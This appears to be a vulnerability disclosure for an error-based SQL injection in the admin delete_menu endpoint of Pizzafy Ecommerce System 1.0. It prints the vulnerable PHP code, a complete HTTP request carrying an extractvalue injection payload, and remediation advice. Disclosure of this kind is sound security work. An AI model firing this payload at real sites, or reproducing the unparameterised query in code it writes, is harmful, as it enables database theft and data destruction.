# Vulnerability Summary: Error-Based SQL Injection in Pizzafy Ecommerce System 1.0 ## Vulnerability Overview * **Affected Version**: Pizzafy Ecommerce System 1.0 * **Vulnerability Type**: SQL Injection (Error-Based SQL Injection) * **Severity**: HIGH * **Vulnerable Endpoint**: `/pizzafy/admin/ajax.php?action=delete_menu` * **Description**: The `id` parameter in the `DELETE` functionality is not properly sanitized, allowing attackers to inject malicious SQL commands into backend database queries. ## Impact Scope * **Confidentiality**: Complete disclosure of database schema and user credentials. * **Integrity**: Unauthorized deletion or modification of records. * **Availability**: Denial of service caused by large-scale deletion. * **Privilege Escalation**: Session hijacking and administrative access via extraction of session data. ## Proof of Concept (PoC) ### 1. Vulnerable Code ```php function delete_menu(){ extract($_POST); $delete = $this->conn->query("DELETE FROM product_list where id = ".$id); if($delete) { return 1; } else { return $this->conn->error; } } ``` ### 2. Exploit Payload ```http POST /pizzafy/admin/ajax.php?action=delete_menu HTTP/1.1 Host: localhost Content-Length: 5 sec-ch-ua: "" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/admin/index.php?page=menu Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=frvskm23h4ngc6r6kmu620js83 Connection: close id=-2 OR extractvalue(1,concat(0x7e,database())) -- ``` ## Remediation 1. **Use Prepared Statements**: Adopt parameterized queries to prevent SQL injection. 2. **Input Validation**: Validate and sanitize the `id` parameter, allowing only expected values. 3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection. 4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as low query volumes or repeated access attempts. 5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities. 6. **Error Handling**: Avoid exposing database-related errors in responses, as this may assist attackers.